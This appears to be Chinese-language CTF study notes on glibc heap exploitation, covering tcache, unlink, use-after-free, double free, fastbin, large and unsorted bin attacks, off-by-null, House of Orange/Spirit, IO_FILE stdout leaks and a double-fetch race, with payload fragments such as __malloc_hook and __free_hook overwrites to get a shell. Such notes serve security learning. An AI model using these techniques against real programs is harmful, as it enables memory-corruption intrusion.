- 每个thread维护一个该结构体,第一次申请会malloc一块内存,该结构在
tcache_init
函数中初始化在堆上,大小为0x250(高版本0x290),数据部分前0x40为counts,释放进入tcache的chunk的下一个相邻chunk的PREV_INUSE
位不清零
1
2
3
4
5
6
7
8
9
|
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
# define TCACHE_MAX_BINS 64
static __thread tcache_perthread_struct *tcache = NULL; // 减少线程竞争
|
stash机制
申请在tcache范围时,先tcache直到空,再去bin找;tcache为空,ptmalloc在其他bin中找,若fastbin/smallbin/unsorted bin有size符合的chunk,填入tcache直到塞满,之后从tcache中取或直接返回找到的chunk(此时chunk在bin中和tcache中顺序颠倒)
安全检查
- tcache key( >libc-2.29 ):tcache新增一个key字段,位于chunk的bk字段,值为tcache结构体地址,若free检测到
chunk->bk==tcache
会遍历tcache查找对应链表中是否有该chunk
- Safe linking机制( > libc-2.32 )
- 绕过:在tcache的一个entry中放入第一个chunk时,其同样会对该entry中的chunk(NULL)进行异或后写入到tcache中chunk的fd字段,若能泄露该fd字段可以获取未经异或的堆上相关地址(右移12位);
tcache->entry
中存放的仍是未加密过的地址,若能够控制tcache
管理器则可以在不知道堆相关地址时任意地址写
Small bins
- 每个bin中的chunk大小都相等,bins[2] ~ bins[63],62个循环双向链表,FIFO
- 管理32位中16、24、32、40、…、504 Bytes的free chunks,64位最大chunk为1008字节(0x3f0)
Large bins
- 每个bin中的chunk大小是一个范围,不相等,fd指针指向的方向上按照chunk大小降序排序,bk指向最小chunk
- bins[64] ~ bins[126],63个循环双向链表,FIFO,管理大于504 Bytes的free chunks(32位下)
- 1 bin 2 bins 4 bins 8 bins 16 bins 32 bins 6组,每组bin的chunk大小之间公差一致
- any 262144b 32768b 4096b 512b 64b
fd_nextsize
和bk_nextsize
与bins
数组无关
- large bin中只有一个chunk时,
fd_nextsize
和bk_nextsize
指向自己
- large bin中有多个同一大小的chunk时,只有相同大小chunk的第一个的
fd_nextsize
和bk_nextsize
指针有效,其余均为NULL
- large bin中有多个不同大小的chunk时,
fd_nextsize
连接比他小的第一个chunk,bk_nextsize
对应反过来连接
- large bin最小的一组chunk中的第一个chunk的
fd_nextsize
连接最大的chunk,最大的chunk的bk_nextsize
相反
Unlink
- 条件:有堆溢出或off by null,且可以泄露出指针数组地址
free
时和目前物理相邻的 free chunk 合并为新堆块,避免碎片化内存,将某一个空闲 chunk 从其所处的双向链表中脱链
- 释放堆时会判断当前 chunk 的相邻 chunk 是否为空闲状态,若是则会进行堆合并。合并时会将空闲 chunk 从 bin 中 unlink,并将合并后的 chunk 添加到 unsorted bin 中。堆合并分为向前合并和向后合并
漏洞点:堆溢出
1
2
|
*(&RecordList + i) = malloc(v1); // v1 < 0x81 Create函数
read(0, *(&RecordList + v1), 0x100uLL); // change函数
|
溢出长度足够大,在已申请的堆中伪造一块已经释放过的堆,当free其前或后面的堆块时会触发unlink,使得伪造的部分会指向一个我们指定的地方,允许我们修改
绕过
2.23
-
1
|
if(__builtin_expect(FD->bk != P || BK->fd != P, 0))
|
伪造fake chunk,将指针数组作为chunk绕过
-
1
2
3
|
if (!in_smallbin_range(chunksize_nomask(P)) && __builtin_expect(P->fd_nextsize != NULL, 0)) {
if (__builtin_expect(P->fd_nextsize->bk_nextsize != P, 0) ||
__builtin_expect(P->bk_nextsize->fd_nextsize != P, 0))
|
使fake chunk属于small bin范围绕过
-
为了使chunk2与fake chunk合并,chunk2的size的PREV_INUSE位为0,且chunk2大小不能在fast bin范围
2.27
-
1
|
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
|
需要将伪造的chunk的size设置为与下一个chunk的prev_size位相等,2.27也可以设prev_size和size为0
原理
- 释放 chunk2 使得与 fake chunk 合并,最终使得目标 P1 指向P1 - 0x18,即P1中内容为P1-0x18的地址,fake chunk进入unsorted bin中
- 此时向P1中写数据,实际是向P1指向的指针数组的第一项内写数据,可以写入
__free_hook
地址,再向指针数组第一项内写数据即向__free_hook
所在地址写数据,写入system
函数地址,此时free一个写了/bin/sh
内容的堆块可以get shell
老版本利用:无对 chunk 的 size 检查和双向链表检查
free(Q)时
- 前向合并,前chunk use,不合并
- 后向合并,后chunk free,合并,对
N
进行unlink
unlink执行效果——64位
1
2
3
4
5
|
FD=P->fd = target addr - 0x18
BK=P->bk = expect value // 变式: = target addr - 0x10
FD->bk = BK,即 *((target addr - 0x18) + 0x18) = BK = expect value // 任意地址写
BK->fd = FD,即 *(expect value + 0x10) = FD = target addr - 0x18
// 变式: = *(target addr) 即第四步将是任意地址写, 目标地址内容更改为(目标地址-0x18)
|
- 实现**任意地址写:**向可写地址
target addr
中写入expect value
,其中expect value + 0x10 地址具有可写的权限
- 此时可以将存储
malloc
地址的recordlist[2]
内容覆盖为恶意地址recordlist[2]-0x18=recordlist[0]
,修改可以将malloc数组全部指针修改为其他的地址并通过change
写入恶意内容
构造链模版不完全RELRO泄露libc基址+getshell
UAF
Use after free:内存块被释放之后再次被使用,关键在于指针未被设置为NULL,即原先指针并没有消失,只是由fastbins或tcache中新增出了指针将chunk连成链表
漏洞点:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
void func1(){ printf("func1\n");}
void hack(){ printf("hack\n");}
struct Pfunc{ void (*p)();};
int main()
{
struct Pfunc* lpfunc = malloc(8);
lpfunc->p = func1;
lpfunc->p(); //"func1"
free(lpfunc);
long* hack_point = malloc(8);
*hack_point = hack;
lpfunc->p(); //"hack"
return 0;
}
|
- fastbins使用LIFO,后进先出,所以申请同样大小的chunk,会使用最后一次free的chunk,此时可达到 hack_point指针 与 lpfunc指针 指向同一个地址【刚才free的chunk地址】
- 调试中,fastbins指向的地址为0x0804b000,而两指针指向的地址为0x0804b008,由于malloc指针指向data,而fastbins指向prev_size,prev_size 和 size 在32位下刚好占8字节,所以偏移了8
1
2
3
4
5
6
|
o = malloc(0x28uLL);
free(o);
s = (char *)malloc(0x20uLL);
fgets(s, 32LL, stdin); //向s指向的地址写数据
free(s);
(*((void (__fastcall **)(void *))o + 3))(o);
|
利用:
o+3是调用func1,但篡改后相当于调用了shellcode
hacknote基本实现:一次malloc两个堆块,且第一个堆块固定为8字节,第二个堆块自己申请
此处也存在漏洞点:打印为(*notelist[i])(notelist[i])
调用puts打印content内容(32位下)
利用方法:先申请两个远大于0x8的note0, note1,共4个堆块,删除0,删除1,进入相应fastbin中,再申请0x8的note并修改print_note,调用print_note即调用system函数
Double free
glibc-2.23
- 堆上某块内存被释放后,未将指向该堆块的指针清零,对该内存进行再次free,达成任意地址写,注:不可以直接连续两次free,会被
_int_free
检测到fastbin double free
- free掉chunk时,判断 chunk 大小和所处位置,若 chunk_size <= max_fast 且 chunk 不位于 heap 的顶部(即不与 top chunk 相邻),则将 chunk 放到 fast bins 中
申请2个0x60的堆块【1,2】进行如下操作:
1
2
3
|
free(1)
free(2)
free(1) # 均进入 fast bins
|
调用 malloc 返回 chunk1 ,修改 chunk1 内容来修改其 fd 指针指向恶意地址,在第四次 malloc 可实现在任意地址分配 fastbin 块,后续利用malloc_hook劫持为one_gadget:fastbin Arbitrary Alloc
fast bin attack
Arbitrary Alloc
条件
- 劫持fastbin中chunk的fd指针指向伪造的fake_chunk,最终覆盖
malloc_hook
地址为one_gadget
,然后执行malloc劫持获得shell
- 需要UAF或堆溢出使得可以对free的堆块编辑更改fd指针
利用
- 申请0123四个堆块,释放2到fastbin,然后申请4来堆叠2和4chunk,用4填写入fd为fake chunk地址,size最后一位须设置为1
- 申请一次为2,申请第二次为fakechunk,即可以在fakechunk处任意读写,fakechunk可以为malloc-0x23等相关地址
- 若可以在uaf后直接编写free后的chunk也可以不堆叠,申请01两个堆块,释放0修改0的fd,最终申请两次
绕过检查:
-
1
2
3
4
5
6
|
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
#define chunksize(p) ((p)->size & ~(SIZE_BITS)) // 将最后三位置0
#define fastbin_index(sz) ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) // 右移4位即低4位无用
idx = fastbin_index(nb);
if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0)) // 该比较使得0x7f与0x70右移4位后效果一致
|
size不考虑低3比特,且libc或栈地址多为0x7f开头,因此可通过截取0x7f用0x70的fastbin将内存申请出来
-
1
2
3
4
5
6
7
8
9
10
11
12
13
|
static void do_check_remalloced_chunk(mstate av, mchunkptr p, INTERNAL_SIZE_T s)
{
INTERNAL_SIZE_T sz = chunksize_nomask(p) & ~(PREV_INUSE | NON_MAIN_ARENA);
if(!chunk_is_mmapped(p)) // p 为 1 绕过检查
{
assert (av == arena_for_chunk(p));
if(chunk_main_arena(p))
assert(av == &main_arena);
else
assert(av != &main_arena);
}
do_check_inuse_chunk(av, p);
}
|
size
位需要0xnf
(111)而非0xn1
(001)
- 字节错位,64位程序中fastbin范围【0x20-0x80】,此时
0x7f403c467aed
的地址(__malloc_hook - 0x23)后的0x000000000000007f
错位出了合理chunk
中的size
域,修改fastbin 的 fd 指针指向该地址
0x7f
在计算fastbin index时,属于chunk大小为0x70的,而chunk又包含了0x10的header,因此选择malloc构造时选择分配0x60或0x68的fastbin,申请2次0x60或0x68的fake chunk实现对__realloc_hook
和__malloc_hook
的控制
gdb
调用具体细节
1
2
3
4
5
6
7
8
9
10
11
12
13
|
pwndbg> x/20gx 0x7f403c467b10 - 0x23
0x7f403c467aed <_IO_wide_data_0+301>: 0x403c466260000000 0x000000000000007f
0x7f403c467afd: 0x403c128ea0000000 0x403c128a7000007f
0x7f403c467b0d <__realloc_hook+5>: 0x000000000000007f 0x0000000000000000
malloc_hook: 4 3 2 1 0 f e d c b a 9 8 7 6 5
0x7f403c467b1d: 0x0000000000000000 0x0000000000000000
0x7f403c467b2d <main_arena+13>: 0x828a2b80c0000000 0x403c467aed000055
0x7f403c467b3d <main_arena+29>: 0x000000000000007f 0x0000000000000000
0x7f403c467b4d <main_arena+45>: 0x0000000000000000 0x0000000000000000
pwndbg> x/gx 0x7f403c467b10
0x7f403c467b10 <__malloc_hook>: 0x0000000000000000
//想要劫持的 __malloc_hook 地址
|
劫持__malloc_hook
构造的payload填入的位置为【malloc_hook地址 - 0x23 + 0x10】或者【malloc_hook地址 - 0x23】,即修改fd指向该位置,data进入的位置是在prev_size
和size
域后面的,一般直接填入b"a" * 0x13 + p64(one_gadget)
,0x13为需要的padding
realloc劫持
- 存在one_gadget有条件的情况需要使用realloc,realloc中有许多push操作以及调整rsp的操作
- 如要求
[rsp+0x30]
必须为NULL或者是0,通过realloc来调整栈帧,rsp在栈上,通过push增加栈的高度
1
2
|
payload = b"a" * (0x13 - 0x8) + p64(one_gadget) + p64(realloc_addr + 0xc)
# +0xc表示只进行一次push,即rsp+0x30-0x8(push)-0x38(sub)-0x8(call) = rsp-0x18上为一块值为0的内存单元
|
- malloc发现malloc_hook不为空,调用malloc_hook里面的realloc+0xc,执行realloc下面一系列push操作,调节栈帧满足one_gadget的条件
- realloc判断realloc_hook是否为空,不为空则执行realloc_hook指向的one_gadget,获取shell
malloc报错触发
通过double free
来触发malloc报错,其最后也会执行malloc,此时栈结构也进行了改变,可能达成one_gadget条件
Tcache bin attack
- 一般利用UAF需要
malloc(0x80)
然后经过7次free(0)
填充完tcache bin
,注:每次free(0)需要修改edit(0)改fd和bk为0,否则fd将会是堆块地址中部分数值,使得不可循环free
- 然后再free时进入
unsorted bin
泄露libc基址
Safe-linking机制
glibc-2.33引入的新检查机制
1
2
3
4
5
|
/* 加密函数 */
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
/* 解密0函数 */
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
|
即
1
2
3
4
5
|
p->fd = ((&p->fd)>>12) ^ REVEAL_PTR(p->fd)
//当前堆块的fd等于 (当前堆块fd的地址 >> 12) ^ 原来的fd(相邻先被释放的堆块地址)
// 第一块被释放: fd = (0x123456789abc >> 12) ^ 0 = 0x123456789
// 第二块被释放: fd = (0x123456789adc >> 12) ^ 0x123456789abc = 0x1235753dfd35
|
绕过方法:通过UAF填写fd
的值为0(初值),之后泄露出该tcache bin
堆块的fd
的值实则为该堆块地址的前9位,进行偏移计算可获得该堆块地址即堆地址
1
2
|
heap_addr = (((u64(r.recv(8)) ^ pre_heap_addr) << 12) % (2**64)) + offset
next = ((heap_addr >> 12) % (2**64)) ^ free_hook_addr
|
覆盖fd
为free_hook
地址异或后的next
地址劫持,申请2个同样大小堆块,从tcache中选出一块,第二块为fd指向的free_hook
地址,写入system
地址后,调用free()
包含'/bin/sh'
的堆块达到getshell目的
Double free
适用于2.27最初版本,两次释放同一块chunk
1
2
3
|
malloc(0x50)
free(0)
free(0)
|
泄露堆地址:UAF导致chunk中的fd指向自己,通过show功能可以泄露出heap的地址,通过调试的偏移可以获取到tcache结构体的基址
控制tcache_perthread_struct
:
- 再申请一个chunk,即为原来的chunk1,将fd覆盖为**
tcache_perthread_struct
**的地址,此时两次malloc后的第二次malloc分配的堆块到tcache_perthread_struct
结构体地址,可以控制该结构体
- 编辑tcache结构体中的count为极大值,导致之后分配的chunk在free后不会进入tcache进行绕过(因为tcache判别时发现已满),此时我们可以将tcache结构体【0x251大于fastbin的0x80】所在的chunk free到unsorted bin中,进行后续利用(泄露地址或unsorted bin attack)
1
2
3
4
5
6
|
new(0x50) #1
edit(1, p64(heap_base - 0x250))
new(0x50) #2
new(0x50) #3
edit(3, 'a' * 0x28)
delete(3)
|
- 当申请堆块可覆盖tcache结构体时,且如上已经覆盖导致tcache认为自己已满,此时可以接着通过覆盖修改结构体中的
tcache_entry
,其中每隔8字节是一个指向tcache bin的地址,如前tcache图中所示,覆盖其中一个地址为跳向【malloc_hook-0x13】的地址,可以达到劫持malloc目的,后续操作参考tcache bin attack,其中注意:若之后要向malloc_hook地址申请0x20的chunk,需要劫持tcache_entry中属于0x30(0x20+0x10)的位置
Large bin attack
- 保护全开,glibc-2.31,通过UAF来利用
- 0x4FF < size < 0xFFF:申请对应large bin,
malloc
时,会遍历 unsorted bin
,若无法精确分配或不满足切割分配条件,会将该 chunk
置入相应大小的 bin
(large bins) 中
泄露libc基址
1
2
3
4
5
6
7
|
create(1, 0x500, b'')
create(2, 0x600, b'')
create(3, 0x700, b'') # 隔开 top chunk
delete(1) # 1 进入 unsorted bin
delete(3) # 3 并入 top chunk
create(4, 0x700, b'') # free chunk 1 无法满足 进入 large bins
browse(1) # 同样可获取一个到main_arena偏移一段距离的地址, 泄露libc基址
|
获取堆地址
1
2
3
4
5
6
7
|
create(0x600) # 0
create(0x6e0) # 1
delete(0)
create(0x6e0) # 2 将unsorted bin中的 0 块放入large bin中
show(0) # 看 0 的fd, bk泄露 main_arena偏移地址来得到libc地址
# 看 0 的fd_nextsize, bk_nextsize来得到堆的偏移地址
# fd=bk, fd_nextsize=bk_nextsize
|
mp_ struct attack
- 修改掉
tcache_bins
:# 只允许的最大tcache chunk大小,释放的小于mp_.tcache_bins
的chunk
会被当作tcache bin
处理,可以把很大的 chunk
用 tcachebin
管理
- 修改掉
tcache_count
: 可以控制链表的 chunk
的数量
1
2
|
tcache_bins = mp_ + 80
tcache_max_bytes = mp_ + 88
|
- 任意地址写堆地址:
large bin
链表中并没有对fd_nextsize
和bk_nextsize
进行双向链表完整性的检查,通过改写large bin
的bk_nextsize
的值来向指定的位置+0x20的位置写入一个堆地址,即很大的值,使得下次free
时堆块将进入tcache
处理
- 通过uaf
browse
出fd
的值,对堆块进行填充时fd保持不变,而更改bk_nextsize
和fd_nextsize
的值,覆写malloc
中tcache
部分的mp_.tcache_bins
的值为一个很大的地址
1
2
3
|
change(5, p64(fd) * 2 + p64(mp_addr + 0x50 - 0x20) * 2)
create(41, 0x900, b'') # 用于触发漏洞,当unsorted bin 遍历将其转入 large bins 更改 tcache_bins
delete(9) # 将会使得该堆块进入tcache bin中
|
因为溢出和tcache struct内容存放在堆空间上的缘故,需要伪造的结构内容会落在我们的可控堆块上,由于0x500(9号堆块)实在太大,导致tcache bin 的链表头写到malloc顺序中的1号堆块中,可调试观察
1
2
3
|
change(1, p64(0) * 13 + p64(free_hook_addr)) # 将9号块位置修改为free_hook地址
create(12, 0x500, p64(system_addr)) # 将拿tcache堆块,即向free_hook处创建堆块,覆盖为system地址
delete(10) # 10号堆块提前写入内容'/bin/sh' 完成getshell
|
- 覆写
free_hook
为system
,进而getshell
Unsorted bin attack
libc地址泄露
结合off-by-null或UAF
1
2
3
4
5
|
# UAF
create(0x100, b'') # chunk 0
create(0x60, b'') # chunk 1 防止与top chunk合并,此处为fast bin
delete(0) # chunk 0 进入 unsorted bin 后续create(0x100, b'')可继续使用该块
show(0)
|
-
unsrted bin双向链表,所以必有一个节点的fd指针指向main_arena结构体内部
-
构造出一个堆块进入unsorted bin形成下图结构,伪造堆块bin1,UAF未置指针为0,显示bin1内容可以泄露出fd指针指向的一个与main_arena
有固定偏移的地址,该偏移可调试得出
-
main_arena
是一个 struct malloc_state
类型的全局变量,是 ptmalloc
管理主分配区的唯一实例,被分配在 .data
或者 .bss
等段上,通过进程所使用的 libc
的 .so
文件,获得 main_arena
与 libc
基地址的偏移,实现对 ASLR
的绕过,也可通过 glibc-2.23 中malloc_hook = main_arena - 0x10
的偏移计算
-
1
|
main_arena_offset = ELF("libc.so.6").symbols["__malloc_hook"] + 0x10 # pwntools
|
-
glibc-2.23中指向main_arena偏移88的地址
通过main_arena获取libc基址:main_arena存储在libc.so.6文件的.data段,IDA打开libc文件,搜索malloc_trim()
,如图得到偏移地址
获取libc基址后获取malloc_hook
和realloc
地址
1
2
|
malloc_hook_addr = libc_base + libc.symbols['__malloc_hook'] # <__malloc_hook>
realloc_addr = libc_base + libc.symbols['realloc'] # <__GI___libc_realloc>
|
泄露堆地址
申请多个堆块
1
2
3
4
5
6
7
8
9
10
11
12
13
|
add(0, 0x80) # chunk 0
add(3, 0x20) # 分割unsorted bin防止合并
add(1, 0x80) # chunk 1
add(4, 0x20) # 分割unsorted bin防止合并
add(2, 0x80) # chunk 2
delete(0)
delete(1)
add(0, 0x80) # chunk 0 再次被申请,fd->main_arena偏移地址 & bk->堆地址
show(0) # 打印main_arena偏移, 由于0截断无法打印堆地址
edit(0, b'a'*8) # 填充将0去除
show(0) # 将打印出的值最后3位改为0即为堆地址
|
任意地址写大数
Unsorted bin
遍历堆块使用bk
指针
1
2
3
4
5
6
7
8
|
// 简化源码 libc-2.27
victim = unsorted_chunks (av)->bk; // 链表尾部堆块:victim
bck = victim->bk; // 倒数第二堆块:bck
// 对victim的size位检查,获取chunk大小
// ... ...不属于small bin范围,则将victim脱链放入合适链中或返回用户
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av); // 此处向bck->fd即((target-0x10)+0x10)处写入main_aren偏移地址,包括7f可达成写入7f构造目的
|
- 通过堆溢出或其他修改
unsorted bin
中堆块的bk(addr+0x8)
为target_addr - 0x10
,malloc
触发漏洞达成写大数(地址数),即向target_addr
写入unsorted_chunks(av)
值——mainarena
偏移地址
Off-by-one
更改后一块的size
位,用于合并堆块造成堆块重叠
Off-by-null
原理:程序向堆缓冲区中写入时,字节数超过了该缓冲区本身所申请的字节数,且刚好越界了一个字节;利用该漏洞可以实现利用方法:poison null byte/off-by-null(适用于libc-2.27)
触发漏洞:
原理:free(b)后并没有将b指针置为NULL,且此时b中的prev_size作为a的内容,可以填入a的数据,若能控制a的数据,超过b的prev_size区域后并且覆盖b的size区域中一个字节,则造成off-by-one
- 要绕过高版本的glibc需要在b上构造数据进行绕过验证,旧版本check为
size==prev_size(next_chunk)
,新版本check为**chunksize(P) != prev_size (next_chunk(P))
**
- 在off by one后,
b
的size
将会由于覆盖而改变,chunksize(P)
即b
的size
大小,被覆盖为了0xa00
,而next_chunk(P)
本来应该为c
的prev_size
,但是此时并不是c
,对于b
的next_chunk
的计算应该是b
的chunk
指针加上b
的size
,即图中【b-0x10+0xa00】,仍在b
的chunk
内,所以提前构造* (size_t)(b+0x9f0) = 0xa00;
free b
后,进入unsorted bin
中,申请新的B1
和B2
,将会从原来b
的位置延续,而修改c
的pre_size
时也会因为伪造导致修改在了向上偏0x10的位置处,所以c
仍然认为prev_size
为0xa10,free B1和c后,会导致B1、B2和c一同合并为一个大chunk进入unsorted bin
中,而B2并没有被free,再次申请d,会出现覆盖B2的情况(形成堆的堆叠),此时可以任意修改B2中的内容,通常B2(受害者)将是一个结构,其中包含我们要控制的有价值的指针
漏洞点:
1
2
|
for(i=0; ;++i)
if(i > length) break //i=length时多写一个
|
利用实现unsorted bin泄露方法:
构造0,1,2,3共四个堆块,修改0号堆块内容溢出一字节到1堆块更改大小覆盖1和2堆块,此时1和2堆块被系统误认为为一个堆块,释放1堆块,将会有一个合并chunk进入unsorted bin(进入的前提为1和2堆块相加的大小要大于0x80),再申请一个堆块(和1堆块大小相等),此时unsorted bin分割导致只存有2堆块,2堆块的fd和bk都指向一个地址,访问2堆块可以泄露相关main_arena的地址
House of
House of strom
glibc-2.27及之前版本
House of orange
- glibc-2.23~2.26,无
free
函数,仅仅存在堆溢出,可以unsorted bin attack
- 溢出控制
top chunk
大小为unsorted bin
大小,free后得到unsorted bin
中的堆块,nb为申请的堆块大小,条件:
- nb + MINSIZE > old_top_chunk_size > MINSIZE
- old_top_chunk的pre_inuse = 1
- top_chunk_start + size的地址页对齐,末尾三位为0
- malloc(need),need > top_chunk_size
- nb < 0x20000
1
2
3
4
5
6
7
|
// 调用链 malloc > sysmalloc > _int_free
_int_free(av, old_top, 1); // 通过此将top chunk free
add(0x10, b'')
edit(0, xxx) # 修改top chunk
add(0x1000, b'') # top chunk 进入 unsorted bin
add(0x400, b'') # 从 unsorted bin 获取堆块
show() # 泄露地址
|
House of spirit
glibc-2.23
目的:在目标位置处伪造 fastbin chunk,并将其释放,达到分配指定地址的 chunk 的目的
- 构造fake_chunk,然后free(a),欺骗malloc认为内存释放,此时进入相应大小的fastbin中
- malloc(0x30),将fake_chunk申请,分配堆块到fake_chunk
攻击条件:
- fake chunk 的 size 大小需要满足对应的 fastbin 的需求(<= 128 on x64),同时也得对齐
- fake chunk 的
ISMMAP
位不能为 1,因为 free 时,如果是 mmap 的 chunk,会单独处理
- fake chunk 的 next chunk 的大小不能小于
2 * SIZE_SZ
,同时也不能大于av->system_mem
适用场景如图:
需要对不可控的中间区域进行利用
IO_FILE
glibc
高版本逐渐移除了__malloc_hook/__free_hook/__realloc_hook
等一众hook
全局变量,需要利用IO_FILE
_IO_FILE_plus
结构体
1
2
3
4
5
6
|
struct _IO_FILE_plus
{
_IO_FILE file;
const struct _IO_jump_t *vtable;
// vtable:实现文件流操作的虚函数表,包含一组函数指针,指向实现各种文件操作的函数
};
|
_IO_FILE
结构
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
|
// Glibc-2.23
struct _IO_FILE
{
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr; /* Current read pointer */
char *_IO_read_end; /* End of get area. */
char *_IO_read_base; /* Start of putback+get area. */
char *_IO_write_base; /* Start of put area. */
char *_IO_write_ptr; /* Current put pointer. */
char *_IO_write_end; /* End of put area. */
char *_IO_buf_base; /* Start of reserve area. */
char *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
int _flags2;
__off_t _old_offset; /* This used to be _offset but it's too small. */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
0x0:'_flags',
0x8:'_IO_read_ptr',
0x10:'_IO_read_end',
0x18:'_IO_read_base',
0x20:'_IO_write_base',
0x28:'_IO_write_ptr',
0x30:'_IO_write_end',
0x38:'_IO_buf_base',
0x40:'_IO_buf_end',
0x48:'_IO_save_base',
0x50:'_IO_backup_base',
0x58:'_IO_save_end',
0x60:'_markers',
0x68:'_chain',
0x70:'_fileno',
0x74:'_flags2',
0x78:'_old_offset',
0x80:'_cur_column',
0x82:'_vtable_offset',
0x83:'_shortbuf',
0x88:'_lock',
0x90:'_offset',
0x98:'_codecvt',
0xa0:'_wide_data',
0xa8:'_freeres_list',
0xb0:'_freeres_buf',
0xb8:'__pad5',
0xc0:'_mode',
0xc4:'_unused2',
0xd8:'vtable'
|
stdin
,stdout
和stderr
都会使用该结构体,分别是**IO_2_1_stdin
,IO_2_1_stdout
,IO_2_1_stderr
**,都开在libc的数据段上
利用:将原本的_flags
或上_IO_CURRENTLY_PUTTING
和_IO_IS_APPENDING
,即0x1800
stdout Leak
bss段中可能存放stdout对应IO_FILE的地址,修改stdout
的FILE
结构体中的缓冲区指针进行信息泄漏
构造payload泄露地址内容:
1
|
payload = p64(0xfbad1800) + p64(0)*3 + p64(leak_libc_addr) + p64(leak_libc_addr + 0x8)
|
当有write
和puts
时将会把该地址内容一并输出
条件竞争
Double Fetch
漏洞点
第一次文件读到内存中判断count大小,而进入else后又执行了读文件到内存,此时不判断count大小
1
2
3
4
5
6
7
8
9
10
11
12
|
// 内存中logcount紧挨guest名字后
file_content_2_memory(a); // 读取本地文件内容到内存中
if ( *(a + 64) > 4 ){ // a+64存储logcount
exit(1);
}
else{
file_content_2_memory(a);
read(0, (void *)(8 * (*(__int16 *)(a + 64) + 2LL) + a + 8), 8uLL);
// 向第logcount偏移的位置读入guest的名字
++*(a + 64);
memory_2_file(a); // 将内存中数据写入本地文件中
}
|
利用: